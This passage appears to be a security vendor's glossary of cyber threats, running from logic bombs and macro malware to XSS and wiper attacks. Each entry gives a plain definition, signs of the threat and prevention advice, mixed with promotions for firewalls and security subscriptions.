How to Recognize This Threat: As logic bombs are typically deployed within a network, the most likely source is a disgruntled IT employee, so close monitoring of the activities of departing staff should reveal any suspicious activities. Logic bombs can also be planted in email attachments and suspicious file downloads, so users should be vigilant when choosing files to download.
How to Prevent This Threat: Limit administrative privileges to a select group of employees so it is less likely someone can cause major network damage by leaving a logic bomb (also a deterrent if the privilege makes it clear who would have done so). A firewall with up-to-date security services subscriptions will detect malware and make it less likely to cause major damage. Shop the top brands for your business.
What is Macro Malware?
Macro Malware (also known as Macro Viruses) is malware that are written in the same programming language as Microsoft Office macros. This malware type is typically spread as attachments in phishing emails and when run, begin to infect all files opened with Office .
How to Recognize This Threat: Users can look for macro malware primarily in suspicious email messages as attachments that have Office file extensions.
How to Prevent This Threat: The simplest method to avoid infection by macro malware is to refrain from opening suspicious email attachments. To protect your network further from infection in case a user does become compromised, ensure you have a firewall with an up-to-date security services subscription. Get a FREE Sophos or SonicWall firewall with a 3-year subscription.
Malicious Process Migration
What is a Malicious Process Migration?
Malicious Process Migration involves a hacker moving malware from one compromised process to another. This allows the hacker to better avoid detection and maintain a connection with the infected computer even when the browser session is ended by the user. It is a fairly common practice in hacking to attempt to gain more privileges or establish a more permanent hold on a device.
How to Recognize This Threat: If a hacker is active on a user’s computer, then there may be increased processor activity. A malicious migration typically uses DLL exploits, which some scans may pick up.
How to Prevent This Threat: Sophos Intercept X endpoint protection is designed to detect and terminate these attacks. The software will also alert network admins that such an attack has occurred, and generate a root cause analysis to further investigate the incident.
What is Malware?
Malware is the all-encompassing term that refers to any malicious software. It includes viruses, worms, Trojans, and spyware.
How to Recognize This Threat: The threat of malware is out there at all times for any device that is online (and even those not connected). It can be spread through email, links, USB drives, and more via both targeted and general attacks.
How to Prevent This Threat: Vigilance is key for users to avoid inviting malware onto their device, by staying away from questionable sites and refraining from downloading suspicious files. For true network protection against malware, your organization should have a firewall complete with a security services subscription. Find the right one for you!
What is a Man-in-the-Middle Attack?
A Man-in-the-Middle Attack involves a hacker intercepting communications between you and an outside entity. This attack can occur via email, social media, WiFi eavesdropping, general online activity, or even phone communications. In such an attack, the hacker can impersonate one of the entities communicating, for instance pretending to be an account holder when transferring money through a bank, and redirecting funds to a private account. Or a hacker could simply intercept personal data a user is sharing with a website.
How to Recognize This Threat: As noted above, the threat is multi-tiered and attacks could occur in a variety of manors. It pays to be aware of your surroundings, whether it be double-checking that websites you interact with are not unsecured, looking out for dummy public WiFi networks, or watching for email phishing schemes.
How to Prevent This Threat: As Man-in-the-Middle attacks vary, it pays to protect against a variety of threats. Your users should be trained to look for signs of these different attacks, but when it comes to your network, a firewall with a security services subscription is the way to go.
What is Mobile Malware?
Mobile Malware is a breed of malware specifically intended to run on mobile devices like smartphones and tablets. Thousands of types of mobile malware have been discovered since late 2010, with researchers having discovered more malicious apps for Android than iOS. Aside from what’s targeted, mobile malware is similar to traditional malware in that it is meant to steal sensitive information from users.
How to Recognize This Threat: Infected devices will use abnormally large amounts of data, drain batteries, have unusual popups, and have unexplained charges on the monthly bill.
How to Prevent This Threat: Just as computer users should exercise caution when web browsing and opening emails, mobile users should only download apps from verified sources, avoiding file sharing sites. If you have mobile devices as part of your organization, ensure your network is protected with a firewall solution that includes a security services subscription. Shop our Promos to get a Sophos or SonicWall firewall free with a subscription. And be sure to include endpoint protection.
What is MongoLock?
MongoLock is a recent strain of ransomware that attempts to remove files and format drives by executing special demands through cmd. Mongolock is designed to take advanced of databases with weak security settings. MongoLock leaves a tell-tale sign of its presence with a ransom note in the form of a “warning.txt” file on a system’s notepad. This warning may also be dropped as an entry inside whatever database is successfully breaches. MongoLock has a global reach and can be found commonly across the modern threat landscape.
In most cases, a MongoLock ransom note asks for .1 BTC, to be paid out to a specified Bitcoin wallet of the attacker’s choosing.
How to Recognize This Threat: When locking up files, MongoLock always adds the extension .mongo to the end of your file names. For example, “Image.PNG” will become “Image.PNG.mongo.” Furthermore, attempting to open any files encrypted by MongoLock will open the “warning.txt” with instructions to pay off the baddies.
How to Prevent This Threat: Since MongoLock usually infects systems through malicious email, training employees in basic email security can help eliminate the most common point of entry for this file-encrypting malware. However, the best solution to ward off MongoLock is a current generation firewall operating with up-to-date firmware and a strong Anti-Virus service. Pick from the top brands to get one shipped to you today.
What is Network Sniffing?
Network Sniffing involves hardware or software that monitors and/or analyzes network traffic. Network sniffing can be done ethically – such as admins monitoring their own network’s status – or maliciously – as these tools in the hands of a hacker can be used to not only monitor private networks, but also intercept, and steal private information traveling over it such as user logins, emails, and proprietary data.
How to Recognize This Threat: An unauthorized sniffer is generally quite difficult to spot unless other sniffers are running to detect them.
How to Prevent This Threat: Secure your network against outside threats such as network sniffers with a firewall along with a security services subscription. Get a firewall Free with a 3-year subscription through SonicWall or Sophos.
What is Obfuscation?
Obfuscation in the cyber world refers to methods used to make computer code unclear, allowing hackers to disguise malware. This is commonly done with a variety of malware so that network professionals and security programs cannot detect or block its presence. Obfuscated code also makes it tougher to analyze malware, which in turn makes it difficult to create a permanent fix. Obfuscation can also be used for good, making legitimate software more secure.
How to Recognize This Threat: Obfuscation is designed to make malware difficult to detect, but antivirus and other intrusion prevention software typically employ heuristic detection techniques which can identify the presence of obfuscated code.
How to Prevent This Threat: Get a firewall from a top brand along with a security services subscription. This will ensure your network has the latest in antivirus and intrusion prevention technology to help find and catch malware with obfuscated code.
What is OS Fingerprinting?
Operating System (OS) Fingerprinting is the process of analyzing data packets which originate from a network in an attempt to glean intelligence to be used in later attacks. By detecting which operating system a network operates on, hackers have an easier time targeting known vulnerabilities. OS Fingerprinting can also collect configuration attributes from remote devices. This type of recon attack is usually the first step in a larger, persistent effort. Networks running old, outdated, or unpatched Operating Systems became big targets when attackers spot their weakness.
How to Recognize This Threat: To detect OS Fingerprinting, it is important to understand how it occurs. There are two types of OS Fingerprinting: Active & Passive.
In an active OS Fingerprinting attempt, attackers send a packet to a victim and then wait on a response to analyze TCP packet contents. In a passive attempt attackers act more as a “sniffer” that makes no deliberate changes or actions against the network. Passive OS Fingerprinting is a more stealth, but far slower process. NMAP is perhaps the most popular and commonly-used tool for OS Fingerprinting.
How to Prevent This Threat: The best way to prevent fingerprinting is to limit the types of traffic that your network accepts and responds to, as well as tightly control what information your network returns. By blocking timestamps, echo replies, and address masks, admins can greatly reduce the usefulness of information that attackers can exfiltrate. Our team of certified engineers can help you reduce attack surfaces on your network and ensure that your firewall and operating system are as stealth as possible.
What is a Parasitic Virus?
A Parasitic Virus (also referred to as a file virus) is a type of virus that spreads by attaching itself to another program. When a program that is infected with a parasitic virus runs, the virus code runs as well, and the computer’s operating system gives the virus code the same rights as the program. This allows the virus to make changes on the computer, install itself within the computer’s memory, or copy itself.
How to Recognize This Threat: Parasitic viruses are not as common as they used to be, but have resurfaced somewhat in recent years. The signs of a parasitic virus infection are similar to those of any virus, slower performance, pop-ups, new tasks running, changes to web browsers, etc.
How to Prevent This Threat: To avoid a parasitic virus infection, users should avoid clicking suspicious links or downloading attachments from unverified emails, as well as visiting suspicious sites. Aside from training users, endpoint protection is key to keeping your network clear of parasitic viruses.
What are patches?
Patches are not actually threats; they are add-ons designed by software creators to fix security vulnerabilities and other known bugs. The idea is that these software creators catch vulnerabilities on their own and patch them before they are exploited, but often an attack by a hacker is the signal that alerts software-makers of security flaws.
How to Recognize This Threat: The threat in this case is not keeping your software updated with the latest patches. Hackers often look to exploit known vulnerabilities, banking on the fact that many do not update their software in a timely manner (or at all).
How to Prevent This Threat: Major software developers have regular updates scheduled and will often alert users directly on their devices. Admins should stay abreast of these updates by subscribing to vulnerability mailing lists as well, since some patches are needed sooner than scheduled updates, and should also set policies to ensure all networked computers have the latest patches. A Managed Security Service subscription from Firewalls.com will help you with your network configuration and ensuring the latest updates are coming through, leaving those nitty-gritty details to us!
What is Phishing?
It’s not following a certain hippie band, nor is it heading down to the lake to catch a trout. Phishing relates to a type of email scam designed to deceive recipients into sharing sensitive information with a hacker. Phishing emails often appear to come from a reputable source such as a bank, social media channel, internal department, or another business with whom you have an account, like a retailer, online game, or online music service.
How to Recognize This Threat: Phishing emails initially appear to be official, but can usually be spotted on closer examination due to slight variations in “From” addresses, typos within the text, or graphics that don’t look quite right. They often include links and attachments to deliver malware.
How to Prevent This Threat: As a general practice, email recipients should not directly click links within email messages and be especially wary of downloading attachments. Organizations should train users to spot phishing emails and avoid interacting with them. For the best protection, email security appliances and subscriptions are designed to stop phishing and the many other threats that might come through email.
Potentially Unwanted Applications (PUA)
What are Potentially Unwanted Applications (PUA)?
In this case, the name Potentially Unwanted Applications (PUA) is fairly self-explanatory. Also known as Potentially Unwanted Programs (PUPs), they are programs that may create security concerns and be unsuitable for use in a networked business. Unlike many other items on this list, these are generally not malicious programs in and of themselves, but they can open the door for problems.
How to Recognize This Threat: Examples of PUA include remote admin tools, adware, and vulnerability scanners. A computer with many of these applications can suffer from performance issues.
How to Prevent This Threat: Administrators can set policies requiring privileges for users to load software on their computers, which can keep PUAs off of your network. But if some may already be there or get through some other way, endpoint security solutions can detect and report PUAs to help eliminate the threat they pose.
Process Privilege Escalation
What is Process Privilege Escalation?
Process Privilege Escalation is an exploit technique that involves a hacker gaining elevated access to resources and administrative authority by enhancing their privileges. There are two common types of privilege escalation: vertical and horizontal. Vertical privilege escalation involves a user accessing files or functions that are normally associated with accounts that have higher privileges. Horizontal privilege escalation allows users to access resources in other accounts with similar privilege levels as they have.
How to Recognize This Threat: Any network with several users can be vulnerable to this type of attack.
How to Prevent This Threat: Limit privileges only to users who need them. The fewer users who have administrative privileges, the tougher it is for hackers to successfully gain top access through this attack. The experts at Firewalls.com can help you prioritize user access privileges with Access Control through Custom Security Solutions.
What does it mean to Quarantine malware?
Quarantine is a technique used by anti-virus and anti-malware software to isolate infected files on a computer. Files identified by this software can include viruses and worms, as well as system files that have been infected.
How to Recognize This Threat: The user may be prompted by anti-virus/anti-malware software with an option to quarantine, clean, or delete identified files.
How to Prevent This Threat: Choosing the quarantine option places the infected file under the control of the anti-virus/anti-malware program, keeping it from further affecting a user’s system. Deleting a file altogether could cause problems if it is a system file that was infected by malware – in which case cleaning the file is a safer option. Ensure your users have a service that detects viruses and malware, giving them the option to clear their computer from infection. Get endpoint protection for your network.
What is Ransomware?
Ransomware is a type of malware that is meant to hold a user or organization for ransom. It may simply deny access to files or could even destroy data if a financial payout is not provided to the hacker who planted it.
How to Recognize This Threat: A computer with ransomware will receive a message that a type of ransom is required to access files that were previously accessible. Typically, those files are locked behind a password that is promised if the ransom is paid. Ransomware is often set to expand across a network if the infected computer is part of a larger organization.
How to Prevent This Threat:As with any malware, users should take care not to download suspicious files or click suspicious links. To protect your organization, ensure you have a firewall with a full suite of security services continuously updated. See your options from the top brands in the industry.
Remote Access Trojan
What is a Remote Access Trojan?
A Remote Access Trojan (or RAT) is an application that allows hackers back door administrative access to a computer. RATs, also known as Creepware, are usually downloaded either as an invisible add-on with software the user chooses to access, such as a game, or it may be sent as an email attachment. Once on a computer, the hacker has almost unfettered access to the system and can use it to spread malware to others, spy on the user, or download and delete files.
How to Recognize This Threat: RATs can be tough to identify in action as they typically do not show up on Task Manager. There may be unusual activity on the computer, but hackers behind these trojans often avoid heavy usage, making them difficult to detect.
How to Prevent This Threat: As with any downloadable malware, users should avoid downloading any suspicious attachments or clicking links they are unsure of. Network administrators should ensure all antivirus/antimalware subscriptions are active and updated, and that their firewalls are optimally configured. Ensure your configuration is at its best by having the experts at the Firewalls.com Security Operations Center handle it for you.
Remote Code Execution
What is Remote Code Execution?
Remote Code Execution (RCE) describes a type of attack in which an attacker is ability to run arbitrary commands or code on a target machine. This vulnerability enables attackers to executive malicious code to take control of affected devices escalated privileges. This type of attack is almost always performed by an automated script and often aims to provide administrative access to attackers. Once a system is compromised, attackers are able to access any information on the compromised network.
How to Recognize This Threat: In most RCE exploits, attackers do their best to hide their presence on the network. Remote Code Execution is often used to gain a foothold from which to launch further attacks.
How to Prevent This Threat: Patching your systems with the latest security updates is key to preventing Remote Code Execution exploits. Because RCE is a broad and flexible class of vulnerability, prevention includes vigilantly fixing holes that allow attackers to gain access to the network.
What is REvil Ransomware?
REvil Ransomware, also known as Sodinokibi, is another strain of ransomware that infects a system or network, encrypts files, and demands a ransom to decrypt them. The ransom demand doubles if the victim fails to pay by the first deadline. REvil is among what’s known as ransomware-as-a-service (RaaS), which involves one group coding the ransomware, while others distribute it.
How to Recognize This Threat: Like other ransomware, a victim of REvil receives a message that the ransom is required to access files that were previously accessible. As far as how it spreads, unlike more targeted varieties, RaaS ransomware types are typically spread more widely, through phishing emails and infected attachments.
How to Prevent This Threat: Also like other ransomware, protecting against a REvil attack is multi-faceted. Educate employees to avoid suspicious links and attachments. Maintain regular backups of your files so you can restore them if they’re encrypted. And employ a next generation firewall with real-time security services that feature sandboxing, machine learning, signature-less defenses, and more to detect and stop ransomware before it strikes.
Rogue Access Point
What is a Rogue Access Point?
A rogue access point (or AP) is any wireless access point that is installed on a network without authorization and is thereby not managed by the network administrator. Rogue APs then do not have the same security setup as other access points. They are especially dangerous as they are physically installed behind a network firewall, meaning someone who gains access to the AP can get access to the broader network. Rogue APs may be installed maliciously by an attacker or simply by an employee looking for their own special wifi access and could be plugged directly into a firewall or network switch, a wall connection, or even other network devices. Regardless, rogue access points may be used for a variety of attacks, including denial of service, data theft, and other malware deployment.
How to Recognize This Threat: A visual inspection of network devices like firewalls and switches can identify an access point that doesn’t belong, but for better visibility, conduct regular scans of your wireless air space, as rogue access points won’t show up over the wire.
How to Prevent This Threat: A Wireless Intrusion Prevention System (WIPS) such as the one offered through WatchGuard can detect and stop rogue APs. A managed network switch is preferable to an unmanaged one, as someone attempting to plug in an access point to a random unused port will not gain access if the device is properly configured. Ensuring logging is enabled can also help identify suspicious activity. And if an employee is responsible for setting up a rogue AP, ensure proper training is in place with policies that discourage this practice. Regardless of how rogue APs are identified, ensure they are addressed as soon as possible.
What is a Rootkit?
A Rootkit is software that helps disguise the presence of malware by hiding programs or processes running on a computer. It is frequently installed with malware and can cover up applications such as keyloggers and password sniffers, as well as signs that a hacker has taken control of the device.
How to Recognize This Threat: You may notice your computer running especially slow. You may also come across a never-before-seen application when checking your Task Manager. If you discover a Rootkit, that means some further nefarious activity is occurring on your system.
How to Prevent This Threat: Endpoint security products have evolved to detect and remove rootkits when scanning for malware. Check out excellent options to secure the endpoints on your network from SonicWall and Sophos.
What is Shellcode?
Shellcode is a special type of code injected remotely which hackers use to exploit a variety of software vulnerabilities. It is so named because it typically spawns a command shell from which attackers can take control of the affected system.
How to Recognize This Threat: You likely will not notice shellcode until you have noticed an attack on the computer.
How to Prevent This Threat: The best way to avoid encountering shellcode on your network is to protect it with a strong firewall accompanied by security services. See your options from the top brands in the industry.
What is Smishing?
Smishing refers to a type of phishing that occurs via text message. The reason for the different beginning? SMS stands for short message service, another way to refer to a text message. And thus the name smishing replaces phishing. Regardless, other then the difference between how it’s received – email vs. text message – the attack concept is the same. An attacker may include a malicious link in a text message that will either release/download malware immediately when clicked, or lead to a form to steal someone’s personal information.
How to Recognize This Threat: A smishing attack will typically come from an unknown number, so that is an initial red flag. Often, that unknown number may not be a real phone number, rather just a few digits. Even still, the message may claim to be from a reputable company or institution. But know that banks and credit card companies will not solicit personal information via text.
How to Prevent This Threat: In short, don’t click anything in a text message unless you are sure of its origin. If you receive a message from a bank, store, or credit card provider that you do normally work with, confirm its origin another way – either by calling a known customer service number or via direct website contact. Keep sensitive information off of your phone as much as possible as well, so there’s little for an attacker to gain. And secure your business phones with mobile endpoint protection, such as Sophos Mobile Advanced.
What is Social Engineering?
Social Engineering references the methods hackers employ to trick users into giving up sensitive information, whether it be by volunteering the information through an email, filling out a fraudulent web form, or downloading malware via an attachment or bad link. Social Engineering is how hackers get the user to behave as they want, usually through tricks.
How to Recognize This Threat: Users should look for email offers that are too good to be true, like a Nigerian Prince providing $1 million if he receives bank account information, or any email that asks to confirm a username, password, credit card, etc. They could be from official looking sources, but users should examine these messages closely and think twice before clicking links, downloading attachments, or sharing information.
How to Prevent This Threat: Vigilance among users is key, knowing how to recognize suspicious messages and not immediately acting without checking their veracity. A strong email security appliance, like the ones offered by Barracuda, can help keep many of these messages from getting through in the first place, while also protecting your network against a user making the wrong move.
What is Spam?
Unlike the ham-like product sold in cans on store shelves, Spam in the online world is unwanted, unsolicited email, usually sent en masse. Much like traditional junk mail that comes to your home mailbox, it often represents sales content. Spammers often use legitimate email addresses to evade anti-spam software. While the emails themselves are often not harmful, they can be used to distribute malware. And the non-harmful emails can still fill up databases, waste staff time, and lead to overlooked legitimate messages due to spam confusion.
How to Recognize This Threat: Most email clients have some type of spam or junk email filter that will identify obvious bulk email, but some messages still get through. If a message contains an ad that you have not asked to receive or seems impersonal, it is likely spam. Harmful spam may also contain suspicious links or attachments, and include typos.
How to Prevent This Threat: As always, training staff to look for the signs of spam is important. And in addition to any out-of-the-box spam filters your email client may have, to secure your organization, look to SonicWall’s email security and anti-spam as an added layer of protection.
What is Spearfishing?
Spearphishing is a targeted email attack that goes after individual victims, such as employees within a business. A hacker will reach out to employees via a phony email (often meant to appear to come from within the organization) to attempt to steal proprietary information or money. Human Resources and Accounting teams are often targeted due to their access to sensitive data, while at the same time, HR and IT departments are often those spoofed as employees are more likely to believe requests from them.
How to Recognize This Threat: Look for unusual requests made via email, such as requests to confirm a username or password, or to provide other sensitive information outside of normal protocol. Spearfishing attacks often include bogus links, so examine any links closely before clicking on them.
How to Prevent This Threat: Train employees to look for the signs of an attack and develop protocols for any release of sensitive information. To protect your network, ensure email security is in place to flag messages that come from outside the organization while also monitoring for suspicious language, links, or attachments in emails.
What is Spoofing?
When spoofing, a hacker forges the sending address of an email for the purpose of a social engineering attack. Users receiving a spoofed email are more likely to open attachments (which could contain malware) or voluntarily share sensitive information (as in a phishing attack) when they believe they know the sender. Commonly spoofed accounts include banks and online stores, in addition to those within a business. Spoofing may also refer to websites, when a bad actor copies the look of a legitimate website – often with a slight variation of its URL – also for malicious purposes.
How to Recognize This Threat: The sender name may be changed, but the address may not, so cross-check both if you are initially suspicious. Also double-check the return path of the message, and look for typos or other style issues that would not normally be included in a legitimate email.
How to Prevent This Threat: An important line of defense is teaching users on your network to be on the lookout for signs of spoofed messages. But to ensure your security, check out email security and anti-spam solutions from SonicWall or Barracuda’s email security offerings.
What is Spyware?
Spyware is software that allows hackers, or even advertisers, to gather sensitive information from you without your permission. Users often get spyware by visiting certain websites, either as an automatic software download that occurs without their knowledge or by answering a popup prompt.
How to Recognize This Threat: A computer infected with spyware will likely run slower or even crash, as it consumes memory and processing capacity. You may notice unusual processes running in the background as well.
How to Prevent This Threat: Antivirus and endpoint security solutions are key to stopping spyware in its tracks. And there’s no better endpoint protection than Sophos Intercept X with EDR.
What is an SQL Injection?
An SQL (structured query language) Injection is an exploit that sends commands via a web server to an SQL database to extract personal data or deliver other malware. If the server that houses the database is not designed correctly, a command placed in a form field could then be executed, for instance calling for the database to output customer data.
How to Recognize This Threat: Web application scans and routine database audits showing the presence of questionable HTML tags or suspicious IP addresses may be able to detect that this type of attack has occurred. Web forms tend to be among the most vulnerable and most targeted.
How to Prevent This Threat: These regular scans can provide recommendations on how to fix SQL vulnerabilities. The best ongoing protection for your website though, is a Web Application Firewall. See your options from SonicWall and Barracuda.
Supply Chain Attack
What is a Supply Chain Attack?
A supply chain attack is a type of cyber attack that targets an often less secure third party organization to gain access to a different target or targets. Hackers may plant various malicious code in a third party business that interacts with typically larger, more secure targets and has access to that target’s systems as part of its day to day business.
In essence, by compromising one weak link in a supply chain, attackers potentially gain access to all of that organization’s clients. Other variations could involve simply breaching the less secure organization and stealing clients’ data directly from them.
How to Recognize This Threat: A supply chain attack can affect any type of organization, including financial firms, retailers, and governments to name a few. The SolarWinds attack of 2020 is a recent example, in which attackers planted malicious code in a software update that went out to thousands of SolarWinds’ customers. This then created a method for attackers to access its clients’ data systems. Hackers used the opening to spy on thousands of organizations, from U.S. government agencies to cybersecurity firms. A past high profile example was the Target breach of 2013.
How to Prevent This Threat: Stopping a supply chain attack requires more than simply strengthening your own network’s security protocols. Organizations must be acutely aware of any partners and ensure only those completely essential to operations have access to their data. And beyond that strict access control, organizations should collaborate with partners to ensure there are no weak security links in a supply chain.
What is a Time-of-Check-Time-of-Use?
Time-of-Check-Time-of-Use (TOCTOU) attacks fall under the category of a race condition (which occurs when two or more operations that should be done in sequence are attempted simultaneously). A hacker is able to access a file and make harmful changes between the time of check (first time the program accesses the file) and the time of use (when the software uses the file). The opportunity window is very short due to that near simultaneous overlap.
How to Recognize This Threat: Shared files that multiple users can access are susceptible to TOCTOU issues. A file that has been corrupted could cause a system crash or corrupt data related to the file.
How to Prevent This Threat:Ensure your network has processes in place to avoid race conditions, such as prioritizing file access so that only one user can edit the file at a time. Firewalls.com Security Operations Center experts can help. Learn about getting your firewall professionally configured.
What is a Trojan?
A Trojan – also known as a Trojan Horse – is a malicious program disguised as legitimate software. The harmful functions it carries out are often hidden, whether they be infecting a device with a virus or stealing personal information. Trojans are often used to carry out ransomware attacks.
How to Recognize This Threat: Trojans often find their way onto computers due to a user’s decision to click an ad or download an attachment. Examples to be wary of are video codecs or game downloads with unclear sources. They may also come with pirated software.
How to Prevent This Threat: Ensure any software your users download is from an official source. Train them to look for and avoid suspicious links. To protect your network from having one slip through, get the latest in firewall and security services subscriptions.
What is a URL Injection?
URL Injection occurs when a hacker has created/injected new pages on an existing website. These pages often contain code that redirects users to other sites or involves the business in attacks against other sites. These injections can be made through software vulnerabilities, unsecured directories, or plug-ins.
How to Recognize This Threat: Google’s Search Console will flag potentially injected pages with a message sent to the website administrator. The admin can then search the full site for new pages that have been added. In other cases, organizations may only become aware of the issue when their page ranking drops via web and search analytics.
How to Prevent This Threat: Once the bad pages are found and accessed without the normal browser, the site administrator can remove them, remove the functions the hacker used to create them, or restore affected directories with a previously saved version. To prevent it from occurring again, though, site vulnerabilities must be addressed. Web Application Firewalls can provide comprehensive protection against hackers. Protect your site with SonicWall or Barracuda WAFs.
Use After Free (UAF)
What is a Use After Free bug or vulnerability?
Use After Free (UAF) refers to a memory corruption bug that occurs when an application tries to use memory no longer assigned to it (or freed) – after that memory has been assigned to another application. This can cause crashes and data to be inadvertently overwritten, or in cyber attack scenarios can lead to arbitrary code execution or allow an attacker to gain remote code execution capabilities. Types of use after free vulnerabilities have often been associated with web browsers such as Google Chrome and Mozilla Firefox, allowing for multiple successful attacks over a number of years.
How to Recognize This Threat: Use after free vulnerabilities are not easy to find – they are typically found and exploited by savvy individuals with a software development background or knowledgeable attackers. Actual/active exploits are often the method for gaining awareness into specific vulnerabilities.
How to Prevent This Threat: Error-free code is a key, but most aren’t involved in that particular aspect of their software and operating systems. So on a broader scale, keeping your browser updated with the latest patches is likely your best form of protection. And of course, for any security scenario, strong end user protection is vital to heading off exploits that haven’t yet been patched. Check out options from Sophos and SonicWall.
What is a Virus?
Viruses are harmful, malicious programs that can spread to other files. They can spread in a number of ways, including via an internet download, opening an email attachment, or connecting physical media to a device. Viruses can range from annoying – displaying messages or pop-ups – to devastating – stealing data or making your computer unusable.
How to Recognize This Threat: An infected computer’s performance can slow significantly, booting up at a snail-like pace. The computer may begin displaying ads or other pop-ups. It may also be running with heavy background activity while the user is not active.
How to Prevent This Threat: Aside from teaching employees to be careful where they click, an organization should have the latest antivirus protection active on its network. Continuously updating antivirus protection is just part of the suite of services through a FortiGuard Security Subscription, available with FortiGate firewalls.
What is a Vulnerability?
A Vulnerability is a flaw or bug in a software application that can be exploited by hackers. Vulnerabilities are commonplace in the software industry with hackers continually looking for new ones to take advantage of.
How to Recognize This Threat: Companies often pay researchers to identify vulnerabilities, while others are not known until hackers exploit them. Businesses can also recognize vulnerabilities by staying abreast of the latest cyber security news.
How to Prevent This Threat: Users should ensure all software is kept up-to-date, enabling auto-updates when possible, as the latest security patches will be pushed automatically. Otherwise, firewalls complete with security services subscriptions can keep vulnerabilities from affecting your organization. Visit our Promos page for the latest deals on firewall bundles.
What is Wardriving?
Wardriving refers to the practice of searching for wireless networks while driving by simply using a laptop or smartphone. It is a form of access point mapping with several variants depending on the transportation mode, such as warwalking, warbiking, & wartraining. At any rate, wardriving and its siblings allow those doing it to see all visible wifi access points in a designated area.
How to Recognize This Threat: The act of wardriving is not technically illegal and doesn’t necessarily lead to individual breaches – as some do so passively. However, some do use the drive-by visibility of a wifi network outside of its designated zone to either steal internet access or worse, exploit a network. You may recognize it by sight if you see someone driving slowly outside your home or business equipped with a special antenna. Or, with the right visibility into your wireless network, you – or your network admins – may spot someone who doesn’t belong.
How to Prevent This Threat: Network visibility is a key starting point, but fully preventing someone from stealing access or data requires a strong security setup. This includes access points with built-in security. Ensure your protection meets the latest standard – WPA2 – and is turned on. Consider an upgrade if your setup has the legacy WEP encryption, which is far less secure. Also ensure your overall network has the added protection of a next generation firewall to prevent access to your broader network and data.
What is WastedLocker Ransomware?
WastedLocker Ransomware is a highly targeted type of ransomware typically used to attack large U.S. organizations. Once it infects a system, the ransomware creates encrypted filenames which include the term “wasted” and an abbreviation of the victim’s name. As with any ransomware, the goal is to infect a system or network, encrypt files, and hold them for ransom. WastedLocker is associated with the Evil Corp malware group. Unlike some forms, it initially has not been associated with exfiltration and auction of stolen data.
How to Recognize This Threat: As WastedLocker is highly targeted, it is also customized to surpass each target’s defenses. One common method to initially gain entry is the usage of a fake software update alert embedded in existing websites.
How to Prevent This Threat: WastedLocker is trickier than many ransomware variants in both its targeted nature and its ability to evade even behavior-based monitoring long enough to infect a system or network. Certainly one method to prevent the threat is to avoid clicking suspicious popups. Additionally as with any ransomware, regular backups including offline backups of files can allow for quick restoration of encrypted information. And any security setup should cover multiple bases, including firewalls, email security, endpoint protection, & security service subscriptions.
What is a Watering Hole Attack?
A Watering Hole Attack involves hackers tracking websites frequented by employees of a targeted business or other organization and planting malware on a vulnerable one of those sites. The malware infects the user simply with a visit to the site (no special action by the user is required), and then remains on the computer to allow a hacker access to sensitive information about the employee’s workplace.
How to Recognize This Threat: The threat is hard to recognize, as it does not change the user experience on any given website. The only method to identify this threat is a suite of strong network security tools.
How to Prevent This Threat: As with any malware threat, the first step is to keep all software up-to-date to take advantage of the latest security patches. But to recognize and prevent watering hole attacks, an organization will need strong intrusion prevention systems (IPS) and other network security features available through a firewall with a security services subscription. And it just so happens SonicWall and Sophos are both offering their top-tier firewalls free with a three-year subscription.
What is Whaling?
Whaling is a type of spear-phishing (targeted email) attack that targets high-level victims, such as corporate leadership. A hacker will pose as a member of leadership and reach out to employees within the organization via phony email to attempt to steal proprietary information or money, as employees tend to be less likely to question a request coming from leadership. Human Resources and Accounting teams are often targeted due to their access to sensitive data.
How to Recognize This Threat: Look for unusual requests made via email, such as requests to transfer funds or provide sensitive information that are outside of normal protocol. Some whaling attacks may also use slightly different email addresses than the real ones or include a link outside the organization.
How to Prevent This Threat: Train employees to look for the signs of an attack and develop protocols for any release of sensitive information. Ensure executives keep personal information such as social media accounts private so that hackers cannot as easily pose as them. Email security can flag messages that come from outside the organization while also monitoring for suspicious language, links, or attachments in emails.
What is WiFi Eavesdropping?
WiFi Eavesdropping can involve a hacker stealing data while on a public, unsecured wifi network. The unsecured transmission of data allows for the theft of anything that’s unencrypted, from passwords to files to financial information (both personal and business-related). WiFi Eavesdropping can also be a more direct process, with hackers setting up a phony free network, made to look like that of an official business. Users who log in to the spoofed network are subject to the same potential theft of data. Finally, it can also occur if hackers are able to gain password access to a protected network.
How to Recognize This Threat: As a business operating a network, regular scans of available wifi networks can reveal whether a spoofed network is operating in your area. Users of public wifi can spot an unsecured network if there is no login required to have access.
How to Prevent This Threat: Users should confirm the validity of a network before connecting. Once on wifi, users can ensure their data is encrypted and difficult to access by using a virtual private network (VPN). Businesses can provide VPN access to their remote employees through a firewall, such as a SonicWall TZ300. A firewall is also the solution for a business offering wifi access, like one with built-in wifi, such as a FortiWiFi device.
What are Wiper Attacks?
A Wiper Attack involves wiping/overwriting/removing data from the victim. Unlike typical cyber attacks which tend to be for monetary gain, wiper attacks are destructive in nature and often do not involve a ransom. Wiper malware may however be used to cover the tracks of a separate data theft.
How to Recognize This Threat: If your network is the victim of a wiper attack, it likely won’t be covert. As wiper malware actively destroys data, it is not meant to linger quietly in the background.
How to Prevent This Threat: Networks should be segmented with access to crucial data limited to a select few. Files should also be backed up in another location. You likely already have a firewall setup, but keeping your network secure is a job that could use some support. The Security Operations Center experts at Firewalls.com can help with Customized Firewall Solutions.
What is XSS?
XSS stands for cross-site scripting, which is a type of injection security attack in which a hacker injects a malicious script or other data into content from trusted websites. The hacker exploits a vulnerability in a trusted site and delivers the malicious code with dynamic content from the site to be executed by a victim’s browser. Traditionally, XSS has been known as a method for hackers to steal cookies, allowing them to impersonate the victim online and use their private accounts. These attacks affect users rather than applications.
How to Recognize This Threat: It can be difficult for a user to recognize when an XSS attack has occurred, but when users are affected, they will likely report the issue to the website where they encountered the issue. Web administrators may also detect issues through routine vulnerability assessments.
How to Prevent This Threat: In addition to regular vulnerability assessments, strong coding, and input & output sanitation are helpful. But a security solution should also be in place, like a web application firewall to protect your users’ information and your organization’s reputation.
Why are You on this list?
You (and your users) are among the greatest cyber threats as it is human behavior that tends to lead to most breaches. A user visiting suspicious websites, downloading questionable software, using a compromised WiFi network, sharing proprietary information, skipping important software updates, or opening a suspicious email attachment opens the door to malware and data loss. You could say people are the greatest vulnerability and therefore the greatest threat to your network security.
How to Recognize This Threat: Look in the mirror and at the number of users across your organization. And don’t forget that hackers are people as well, looking to exploit others’ weaknesses for personal gain.
